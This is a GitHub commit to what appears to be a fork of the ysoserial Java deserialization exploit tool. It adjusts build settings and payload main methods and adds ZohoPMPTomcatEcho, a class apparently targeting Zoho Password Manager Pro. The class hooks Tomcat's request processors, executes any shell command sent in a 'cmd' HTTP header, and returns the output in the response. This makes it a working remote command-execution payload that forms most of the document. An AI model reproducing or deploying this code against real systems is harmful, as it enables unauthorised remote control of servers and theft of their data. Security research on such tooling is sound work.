add ZohoPMPTomcatEcho

syslaowang · Jul 25, 2022 · dabf2f8 · dabf2f8
1 parent 882c2f2
commit dabf2f8
Show file tree

Hide file tree

Showing 5 changed files with 93 additions and 17 deletions.
diff --git a/pom.xml b/pom.xml
@@ -23,8 +23,8 @@
                 <version>3.5.1</version>
                 <configuration>
                     <!-- maximize compatibility -->
-                    <source>1.6</source>
-                    <target>1.6</target>
+                    <source>7</source>
+                    <target>7</target>
                     <!-- ignore noisy internal api warnings -->
                     <compilerArgument>-XDignore.symbol.file</compilerArgument>
                     <fork>true</fork>

diff --git a/src/main/java/ysoserial/payloads/Click1.java b/src/main/java/ysoserial/payloads/Click1.java
@@ -48,7 +48,6 @@
 @Dependencies({"org.apache.click:click-nodeps:2.3.0", "javax.servlet:javax.servlet-api:3.1.0"})
 @Authors({Authors.ARTSPLOIT})
 public class Click1 implements ObjectPayload<Object> {
-
     public static void main(final String[] args) throws Exception {
         PayloadRunner.run(Click1.class, args);
     }

diff --git a/src/main/java/ysoserial/payloads/CommonsBeanutils183NOCC.java b/src/main/java/ysoserial/payloads/CommonsBeanutils183NOCC.java
@@ -20,12 +20,7 @@
 @Authors({Authors.Y4ER})
 public class CommonsBeanutils183NOCC implements ObjectPayload<Object> {
     public static void main(String[] args) throws Exception {
-        PayloadRunner.run(CommonsBeanutils192NOCC.class, args);
-
-//        Object object = new CommonsBeanutils183NOCC().getObject("CLASS:TomcatListenerNeoRegFromThread");
-//        File file = new File("/tmp/ser.ser");
-//        if (file.exists()) file.delete();
-//        Serializer.serialize(object, new FileOutputStream(file));
+        PayloadRunner.run(CommonsBeanutils183NOCC.class, args);
     }
 
     @Override

diff --git a/src/main/java/ysoserial/payloads/CommonsBeanutils192NOCC.java b/src/main/java/ysoserial/payloads/CommonsBeanutils192NOCC.java
@@ -1,14 +1,18 @@
 package ysoserial.payloads;
 
 import org.apache.commons.beanutils.BeanComparator;
+import org.apache.commons.codec.binary.Base64;
 import ysoserial.Serializer;
 import ysoserial.payloads.annotation.Authors;
 import ysoserial.payloads.annotation.Dependencies;
 import ysoserial.payloads.util.Gadgets;
+import ysoserial.payloads.util.PayloadRunner;
 import ysoserial.payloads.util.Reflections;
 
 import java.io.File;
 import java.io.FileOutputStream;
+import java.nio.file.Files;
+import java.nio.file.Paths;
 import java.util.PriorityQueue;
 
 @SuppressWarnings({"rawtypes", "unchecked"})
@@ -17,14 +21,7 @@
 public class CommonsBeanutils192NOCC implements ObjectPayload<Object> {
 
     public static void main(final String[] args) throws Exception {
-//        PayloadRunner.run(CommonsBeanutils1NOCC.class, args);
-//        String encode = BASE64Encoder.class.newInstance().encode(ClassFiles.classAsBytes(SpringInterceptorTemplate.class)).replaceAll("\n", "");
-//        System.out.println(encode.replaceAll("\n", ""));
-//
-        Object object = new CommonsBeanutils192NOCC().getObject("CMD:open -a Calculator.app");
-        File file = new File("/tmp/ser.ser");
-        if (file.exists()) file.delete();
-        Serializer.serialize(object, new FileOutputStream(file));
+        PayloadRunner.run(CommonsBeanutils192NOCC.class, args);
     }
 
     public Object getObject(final String command) throws Exception {

diff --git a/src/main/java/ysoserial/payloads/templates/ZohoPMPTomcatEcho.java b/src/main/java/ysoserial/payloads/templates/ZohoPMPTomcatEcho.java
@@ -0,0 +1,85 @@
+package ysoserial.payloads.templates;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+import org.apache.catalina.connector.Connector;
+import org.apache.catalina.core.ApplicationContext;
+import org.apache.catalina.core.StandardContext;
+import org.apache.catalina.core.StandardService;
+import org.apache.catalina.loader.ParallelWebappClassLoader;
+import org.apache.coyote.*;
+
+import java.io.InputStream;
+import java.lang.reflect.Field;
+import java.nio.ByteBuffer;
+import java.nio.charset.Charset;
+import java.util.ArrayList;
+import java.util.Scanner;
+
+public class ZohoPMPTomcatEcho extends AbstractTranslet {
+
+    static {
+        try {
+            ParallelWebappClassLoader parallelWebappClassLoader = (ParallelWebappClassLoader) Thread.currentThread().getContextClassLoader();
+            StandardContext standardContext = (StandardContext) parallelWebappClassLoader.getResources().getContext();
+            Field context = standardContext.getClass().getDeclaredField("context");
+            context.setAccessible(true);
+            ApplicationContext applicationContext = (ApplicationContext) context.get(standardContext);
+            Field service = applicationContext.getClass().getDeclaredField("service");
+            service.setAccessible(true);
+            StandardService standardService = (StandardService) service.get(applicationContext);
+            Connector[] connectors = standardService.findConnectors();
+            for (int i = 0; i < connectors.length; i++) {
+                Connector connector = connectors[i];
+                ProtocolHandler protocolHandler = connector.getProtocolHandler();
+                Field handler = AbstractProtocol.class.getDeclaredField("handler");
+                handler.setAccessible(true);
+                Object o = handler.get(protocolHandler);
+                Field global = o.getClass().getDeclaredField("global");
+                global.setAccessible(true);
+                o = global.get(o);
+                Field processors = o.getClass().getDeclaredField("processors");
+                processors.setAccessible(true);
+                ArrayList processorsList = (ArrayList) processors.get(o);
+                for (int j = 0; j < processorsList.size(); j++) {
+                    Object o1 = processorsList.get(j);
+                    Field req = o1.getClass().getDeclaredField("req");
+                    req.setAccessible(true);
+                    org.apache.coyote.Request request = (Request) req.get(o1);
+                    Response response = request.getResponse();
+                    response.addHeader("rce", "rce");
+                    try {
+                        String osTyp = System.getProperty("os.name");
+                        String cmd = request.getHeader("cmd");
+                        boolean isLinux = true;
+                        if (osTyp != null && osTyp.toLowerCase().contains("win")) {
+                            isLinux = false;
+                        }
+                        String[] cmds = isLinux ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
+                        InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
+                        Scanner s = new Scanner(in).useDelimiter("\\a");
+                        String output = s.hasNext() ? s.next() : "";
+                        response.doWrite(ByteBuffer.wrap(output.getBytes(Charset.forName("utf8"))));
+                    } catch (Exception e) {
+                        continue;
+                    }
+                }
+            }
+        } catch (Exception e) {
+        }
+    }
+
+
+    @Override
+    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+    }
+
+    @Override
+    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+    }
+}